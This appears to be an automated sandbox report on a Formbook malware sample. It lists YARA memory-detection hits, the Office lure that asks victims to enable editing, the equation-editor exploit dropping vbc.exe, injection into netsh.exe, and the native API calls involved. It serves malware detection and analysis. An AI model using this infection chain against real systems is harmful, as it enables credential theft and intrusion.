      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 0 " 21 22
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004030FB
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004047D34_2_004047D3
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004061D44_2_004061D4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100088364_2_10008836
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10003D104_2_10003D10
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100110E14_2_100110E1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000F9024_2_1000F902
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100119AC4_2_100119AC
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100059B14_2_100059B1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001AA244_2_1001AA24
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001AA334_2_1001AA33
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000B23E4_2_1000B23E
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000FE744_2_1000FE74
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10005EA54_2_10005EA5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100062BD4_2_100062BD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100066F24_2_100066F2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10006B274_2_10006B27
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000F3904_2_1000F390
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004010265_2_00401026
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004010285_2_00401028
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8935_2_0041B893
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8965_2_0041B896
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C9635_2_0041C963
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D1F85_2_0041D1F8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C705_2_00408C70
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D875_2_00402D87
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF0D5_2_0041BF0D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0091E0C65_2_0091E0C6
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0094D0055_2_0094D005
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0093905A5_2_0093905A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009230405_2_00923040
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0091E2E95_2_0091E2E9
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009C12385_2_009C1238
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009463DB5_2_009463DB
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0091F3CF5_2_0091F3CF
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009223055_2_00922305
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009273535_2_00927353
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0096A37B5_2_0096A37B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009554855_2_00955485
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009314895_2_00931489
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0095D47D5_2_0095D47D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0093C5F05_2_0093C5F0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0092351F5_2_0092351F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009246805_2_00924680
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0092E6C15_2_0092E6C1
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009C26225_2_009C2622
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009A579A5_2_009A579A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0092C7BC5_2_0092C7BC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009557C35_2_009557C3
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009BF8EE5_2_009BF8EE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0092C85C5_2_0092C85C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0094286D5_2_0094286D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009C098E5_2_009C098E
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009229B25_2_009229B2
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009369FE5_2_009369FE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009A59555_2_009A5955
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009D3A835_2_009D3A83
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009CCBA45_2_009CCBA4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009ADBDA5_2_009ADBDA
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FBD75_2_0091FBD7
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00947B005_2_00947B00
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C7E0C68_2_00C7E0C6
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C830408_2_00C83040
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C9905A8_2_00C9905A
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00CAD0058_2_00CAD005
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C7E2E98_2_00C7E2E9
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D212388_2_00D21238
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C7F3CF8_2_00C7F3CF
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00CA63DB8_2_00CA63DB
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C873538_2_00C87353
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00CCA37B8_2_00CCA37B
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C823058_2_00C82305
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C914898_2_00C91489
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00CB54858_2_00CB5485
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C9C5F08_2_00C9C5F0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C8351F8_2_00C8351F
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C8E6C18_2_00C8E6C1
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C846808_2_00C84680
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D226228_2_00D22622
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D0579A8_2_00D0579A
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C8C7BC8_2_00C8C7BC
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D1F8EE8_2_00D1F8EE
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C8C85C8_2_00C8C85C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00CA286D8_2_00CA286D
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C969FE8_2_00C969FE
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D2098E8_2_00D2098E
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C829B28_2_00C829B2
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D059558_2_00D05955
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D33A838_2_00D33A83
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D0DBDA8_2_00D0DBDA
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C7FBD78_2_00C7FBD7
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D2CBA48_2_00D2CBA4
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00CA7B008_2_00CA7B00
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00D1FDDD8_2_00D1FDDD
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C8CD5B8_2_00C8CD5B
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00CB0D3B8_2_00CB0D3B
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C9EE4C8_2_00C9EE4C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C90F3F8_2_00C90F3F
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009B8938_2_0009B893
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009B8968_2_0009B896
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009C9638_2_0009C963
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009D1E58_2_0009D1E5
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00088C708_2_00088C70
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00082D878_2_00082D87
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00082D908_2_00082D90
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00082FB08_2_00082FB0
      Source: C:\Users\Public\vbc.exeCode function: String function: 0091DF5C appears 89 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00963F92 appears 73 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 0091E2A8 appears 32 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 0098F970 appears 71 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 0096373B appears 185 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00C7E2A8 appears 38 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00CEF970 appears 77 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00CC3F92 appears 99 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00CC373B appears 237 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00C7DF5C appears 101 times
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004185B0 NtCreateFile,5_2_004185B0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00418660 NtReadFile,5_2_00418660
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004186E0 NtClose,5_2_004186E0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00418790 NtAllocateVirtualMemory,5_2_00418790
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,5_2_009100C4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00910048
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,5_2_00910078
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk,5_2_009107AC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,5_2_0090F9F0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,5_2_0090F900
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0090FAD0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0090FAE8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0090FBB8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0090FB68
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0090FC90
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0090FC60
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,5_2_0090FD8C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0090FDC0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0090FEA0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0090FED0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,5_2_0090FFB4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009110D0 NtOpenProcessToken,5_2_009110D0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00910060 NtQuerySection,5_2_00910060
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009101D4 NtSetValueKey,5_2_009101D4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0091010C NtOpenDirectoryObject,5_2_0091010C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00911148 NtOpenThread,5_2_00911148
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F8CC NtWaitForSingleObject,5_2_0090F8CC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00911930 NtSetContextThread,5_2_00911930
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F938 NtWriteFile,5_2_0090F938
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAB8 NtQueryValueKey,5_2_0090FAB8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FA20 NtQueryInformationFile,5_2_0090FA20
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FA50 NtEnumerateValueKey,5_2_0090FA50
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FBE8 NtQueryVirtualMemory,5_2_0090FBE8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FB50 NtCreateKey,5_2_0090FB50
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC30 NtOpenProcess,5_2_0090FC30
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C700C4 NtCreateFile,LdrInitializeThunk,8_2_00C700C4
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C707AC NtCreateMutant,LdrInitializeThunk,8_2_00C707AC
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6F9F0 NtClose,LdrInitializeThunk,8_2_00C6F9F0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6F900 NtReadFile,LdrInitializeThunk,8_2_00C6F900
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_00C6FAE8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_00C6FBB8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FB50 NtCreateKey,LdrInitializeThunk,8_2_00C6FB50
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_00C6FB68
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_00C6FC60
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_00C6FDC0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FD8C NtDelayExecution,LdrInitializeThunk,8_2_00C6FD8C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_00C6FED0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FFB4 NtCreateSection,LdrInitializeThunk,8_2_00C6FFB4
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C710D0 NtOpenProcessToken,8_2_00C710D0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C70048 NtProtectVirtualMemory,8_2_00C70048
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C70060 NtQuerySection,8_2_00C70060
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C70078 NtResumeThread,8_2_00C70078
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C701D4 NtSetValueKey,8_2_00C701D4
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C71148 NtOpenThread,8_2_00C71148
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C7010C NtOpenDirectoryObject,8_2_00C7010C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6F8CC NtWaitForSingleObject,8_2_00C6F8CC
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C71930 NtSetContextThread,8_2_00C71930
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6F938 NtWriteFile,8_2_00C6F938
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FAD0 NtAllocateVirtualMemory,8_2_00C6FAD0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FAB8 NtQueryValueKey,8_2_00C6FAB8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FA50 NtEnumerateValueKey,8_2_00C6FA50
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FA20 NtQueryInformationFile,8_2_00C6FA20
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FBE8 NtQueryVirtualMemory,8_2_00C6FBE8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FC90 NtUnmapViewOfSection,8_2_00C6FC90
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C70C40 NtGetContextThread,8_2_00C70C40
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FC48 NtSetInformationFile,8_2_00C6FC48
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FC30 NtOpenProcess,8_2_00C6FC30
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C71D80 NtSuspendThread,8_2_00C71D80
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FD5C NtEnumerateKey,8_2_00C6FD5C
